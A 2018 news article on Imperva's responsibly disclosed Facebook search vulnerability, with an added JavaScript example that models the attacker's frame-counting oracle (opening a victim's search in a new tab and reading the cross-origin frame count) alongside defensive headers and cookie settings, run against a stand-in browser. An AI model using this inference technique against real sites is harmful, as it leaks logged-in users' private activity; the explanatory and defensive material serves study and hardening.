Vulnerability in Facebook could have exposed personal user data

15 November, 2018, 21:01 | Author: Sammy Rose
  • Another Facebook vulnerability risked personal user information

Imperva security researcher Masas says in the announcement, "Having reported the vulnerability to Facebook under their responsible disclosure program in May 2018, we worked with the Facebook Security Team to mitigate regressions and ensure that the issue was thoroughly resolved".

"A unique feature of the uncovered bug is the exploitation of the iframe element within Facebook's search feature", Masas told SiliconANGLE Tuesday. Masas found that Facebook search results were not sufficiently protected against cross-site request forgery, so a malicious site could load a Facebook search in an iframe and extract data from the profile the victim was logged into in another tab.

Ankush Johar, Director at Infosec Ventures, explained, "Although CSRF flaws have a big prerequisite to work, that the user must be logged in to the website while he/she visits the infected page, what makes the Facebook vulnerability risky is that, unlike with other websites, most users are always logged into Facebook in their browsers, thus putting everyone at massive risk". For example, the exploit could see if a user liked a certain page.

Attackers could have run queries with certain graph searches, such as to find out whether you liked a page, if you took photos at a certain location or if you or your friends used specific keywords in your posts.

Masas warned that though a CSRF attack is not a common technique, it could rise in popularity next year.

While testing the attack, Masas was able to determine specific data about users and their friends regardless of their privacy settings. The attack starts on a page the attacker controls: if the user interacts with that page in any way, such as scrolling or clicking, it executes malicious JavaScript that opens a new tab and automates the search queries there.

Masas added that the vulnerability was especially unsafe for mobile phone users, who may not even notice a new browser tab opening when the attack takes place.
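The attack sequence described in the preceding paragraphs, as an added example that is not Imperva's or Facebook's code. The first half models the attacker's page: it opens the logged-in victim's search page in a new tab and reads how many frames that page contains, treating the count as a yes/no answer to the search (the article says the iframe element was the lever; that the signal is the frame count is this example's assumption, and a stand-in object replaces the browser window so the logic runs outside a browser). The second half shows response headers and a cookie attribute that close this class of leak; they are real headers, chosen by the editor for illustration, not something the article reports Facebook or Imperva using. The search URLs, frame counts and cookie name are constructed.

```javascript
// Added example, not Imperva's or Facebook's code. Models the cross-site
// frame-counting oracle described in the article and the headers that
// close it. Search URLs, frame counts and the cookie name are assumptions.

// --- Attacker side -------------------------------------------------------
// Once the victim has clicked or scrolled (a user gesture, so the popup is
// not blocked), the attacker's page opens the target's search URL in a new
// tab. Browsers let the opener read the length of a cross-origin window's
// frames collection. If the results page embeds a different number of
// iframes when a query matches than when it does not, that count answers a
// yes/no question about the logged-in victim. `win` is injected so the same
// code can run against the stand-in below.
function probeSearch(win, searchUrl, framesWhenNoResults) {
  const popup = win.open(searchUrl, "_blank");
  if (!popup) return null;                      // popup blocked outright
  try {
    // With Cross-Origin-Opener-Policy on the target, the handle the opener
    // gets back is severed: it reports closed and an empty frames list.
    if (popup.closed) return null;
    const count = popup.frames.length;          // readable across origins
    return count !== framesWhenNoResults;       // true: the query matched
  } finally {
    popup.close();
  }
}

// Runs a batch of yes/no questions, e.g. "did the victim like page X",
// "did the victim or friends post about Y", and collects the inferences.
function runQueries(win, questions, framesWhenNoResults) {
  const answers = {};
  for (const [label, searchUrl] of Object.entries(questions)) {
    answers[label] = probeSearch(win, searchUrl, framesWhenNoResults);
  }
  return answers;
}

// --- Defender side -------------------------------------------------------
// Headers that close both variants. COOP addresses the new-tab variant by
// cutting the opener's reference; frame-ancestors / X-Frame-Options stop
// the page being embedded in an iframe on another origin at all.
function hardenedHeaders() {
  return {
    "Cross-Origin-Opener-Policy": "same-origin",
    "Content-Security-Policy": "frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
  };
}

// Session cookie attributes (cookie name is an assumption). SameSite=Lax is
// NOT enough on its own: opening a new tab is a top-level navigation, and
// Lax still sends the cookie with it, so the search runs as the victim.
// Strict withholds the cookie on every cross-site navigation.
function sessionCookie(value, sameSite = "Strict") {
  return `sid=${value}; Path=/; Secure; HttpOnly; SameSite=${sameSite}`;
}

// True if a browser would attach this cookie to a cross-site top-level GET
// such as the attacker's new tab. An absent attribute is treated as Lax
// (Chromium's default), which still sends it.
function cookieSentOnCrossSiteTopLevelNavigation(setCookieHeader) {
  const m = /SameSite=(Strict|Lax|None)/i.exec(setCookieHeader);
  const mode = m ? m[1].toLowerCase() : "lax";
  return mode !== "strict";
}

// --- Constructed stand-in for the browser window -------------------------
// frameCountByUrl maps a search URL to the number of frames the opened
// page would expose; unknown URLs look like an empty result (2 frames).
// With coop=true the opened window behaves as if the target sent COOP.
function fakeBrowser(frameCountByUrl, coop = false) {
  return {
    open(url) {
      if (coop) return { closed: true, frames: { length: 0 }, close() {} };
      const n = url in frameCountByUrl ? frameCountByUrl[url] : 2;
      return { closed: false, frames: { length: n }, close() {} };
    },
  };
}

// Constructed sample run: the URL shapes are placeholders, not real
// Facebook search syntax.
const SAMPLE_QUESTIONS = {
  liked_example_page: "https://www.facebook.com/search/?q=liked%3Aexample",
  liked_other_page:   "https://www.facebook.com/search/?q=liked%3Aother",
};
const SAMPLE_FRAMES = { [SAMPLE_QUESTIONS.liked_example_page]: 3 };

console.log(runQueries(fakeBrowser(SAMPLE_FRAMES), SAMPLE_QUESTIONS, 2));
console.log(runQueries(fakeBrowser(SAMPLE_FRAMES, true), SAMPLE_QUESTIONS, 2));
console.log(hardenedHeaders(), sessionCookie("example-session-id"));
```

The stand-in exists only so the inference logic can be exercised offline; in a browser, `win` is the attacker page's own `window`. Note that the defensive cookie check treats a missing SameSite attribute as Lax, which is Chromium's default and still permits the cross-site top-level navigation the attack relies on.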

Even where these search queries did not expose fine-grained details, they exposed second-hand information that, pieced together, could reveal the identity of a user and his or her circle of friends.

Imperva, a cybersecurity company, discovered the flaw and disclosed it to Facebook in May. "As the underlying behavior is not specific to Facebook, we've made recommendations to browser makers and relevant web standards groups to encourage them to take steps to prevent this type of issue from occurring in other web applications".

News of the bug comes amid increased scrutiny for Facebook following a string of data privacy scandals.
